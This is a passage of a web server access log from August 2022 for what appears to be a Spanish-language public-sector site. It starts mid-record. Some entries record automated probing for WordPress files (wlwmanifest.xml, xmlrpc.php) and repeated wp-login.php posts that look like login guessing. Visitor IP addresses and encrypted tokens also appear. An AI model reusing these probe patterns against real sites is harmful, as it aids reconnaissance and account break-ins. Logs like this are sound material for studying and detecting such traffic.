On2JUxoBdl1L1aoPIqCpEXPz2IKOJqE4dh7+rMGy3ZSu6yLoZdolsRflxO2DmrNQBGTt2hbBNfQqXACynxArF4Im5kVGhXexktcB1/pK1UpdxkvGrAP4JGJbfuhoBm9lewbNdNkrz9a8XxJLWW+fPg7amxpzbpxz+6DY=&u=U2FsdGVkX18ljZa3IqOKi6wTYtllh/Tbcbl7bN/1ngT8PWMIDAum3JosbW4T8qLJ&y=U2FsdGVkX188nluHpRX6DcPZc2rJ6CcIiyrYevfbieSKYm8UzinWWLKmQG9ityog HTTP/1.1" 200 6490
186.102.96.113 - - [14/Aug/2022:13:37:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18+GPVmNGJKmrTkFjZ3O5wCLcvHSd2keykXyZ4JuQ+wYBCJt8mZ+GLUkXFtKPiMPq0EqHrQMRZrkX3OtFPe/i0eNDYvvbzTHZfix1TmL3fPvAREj8j1rllnmLurT4NXcdgzUTK/jmyjPJ/aAie6XsOqz2RvWv3n8tW4OF6tDQxkuH+J5wdvr5B4Gp7RM5VemQN3mbgBz/ytaGFGMVGxMrDybA3OziJxI/YSsxogAVCxrUq2ODR22RuPjYvj1V/xmSw9pqv9dYx+XYDt8smQacQzVttz1KcjNWg=&u=U2FsdGVkX18ljZa3IqOKi6wTYtllh/Tbcbl7bN/1ngT8PWMIDAum3JosbW4T8qLJ&y=U2FsdGVkX188nluHpRX6DcPZc2rJ6CcIiyrYevfbieSKYm8UzinWWLKmQG9ityog HTTP/1.1" 200 176
186.102.96.113 - - [14/Aug/2022:13:37:23 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+i1b3PAsAHb/4Koy9oy/DiMlAoBMgb2L0T6eqi5rwEmKZw+W8ucHUX HTTP/1.1" 200 30992
201.245.192.253 - - [14/Aug/2022:13:37:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:36:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:37:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59819
201.245.192.253 - - [14/Aug/2022:13:40:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45914
201.245.192.253 - - [14/Aug/2022:13:40:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44432
208.67.104.254 - - [14/Aug/2022:13:40:20 -0500] "GET / HTTP/1.1" 200 319
208.67.104.254 - - [14/Aug/2022:13:40:36 -0500] "GET / HTTP/1.1" 200 319
208.67.104.254 - - [14/Aug/2022:13:40:52 -0500] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
208.67.104.254 - - [14/Aug/2022:13:41:07 -0500] "GET /xmlrpc.php?rsd HTTP/1.1" 404 1018
208.67.104.254 - - [14/Aug/2022:13:41:23 -0500] "GET / HTTP/1.1" 200 319
208.67.104.254 - - [14/Aug/2022:13:41:39 -0500] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
208.67.104.254 - - [14/Aug/2022:13:41:55 -0500] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
216.245.221.92 - - [14/Aug/2022:13:42:21 -0500] "HEAD / HTTP/1.1" 200 -
208.67.104.254 - - [14/Aug/2022:13:42:11 -0500] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
201.245.192.253 - - [14/Aug/2022:13:42:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
208.67.104.254 - - [14/Aug/2022:13:42:27 -0500] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
208.67.104.254 - - [14/Aug/2022:13:42:43 -0500] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
208.67.104.254 - - [14/Aug/2022:13:42:59 -0500] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
208.67.104.254 - - [14/Aug/2022:13:43:15 -0500] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 1018
172.22.2.4 - - [14/Aug/2022:13:42:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:42:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
185.119.81.102 - - [14/Aug/2022:13:44:59 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [14/Aug/2022:13:45:00 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
157.55.39.50 - - [14/Aug/2022:13:46:12 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/Pieza-bolsas-plasticos-ambiente-11-mayo-1200x480.jpg HTTP/1.1" 200 75549
3.238.252.196 - - [14/Aug/2022:13:46:46 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [14/Aug/2022:13:47:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [14/Aug/2022:13:47:04 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.29.53.152 - - [14/Aug/2022:13:47:06 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.29.53.152 - - [14/Aug/2022:13:47:07 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [14/Aug/2022:13:47:21 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [14/Aug/2022:13:47:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [14/Aug/2022:13:47:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [14/Aug/2022:13:47:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [14/Aug/2022:13:47:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.29.53.152 - - [14/Aug/2022:13:48:09 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 635935
186.29.53.152 - - [14/Aug/2022:13:49:01 -0500] "GET /BLA/resoluciones/AUTOS%202011/2198.pdf HTTP/1.1" 200 299332
172.22.2.4 - - [14/Aug/2022:13:47:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Aug/2022:13:48:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
66.220.149.12 - - [14/Aug/2022:13:51:56 -0500] "GET /humedales-por-que-son-importantes-en-epoca-de-lluvia.html HTTP/1.1" 206 793
216.245.221.92 - - [14/Aug/2022:13:52:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Aug/2022:13:52:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
34.141.150.123 - - [14/Aug/2022:13:52:47 -0500] "GET / HTTP/1.1" 200 319
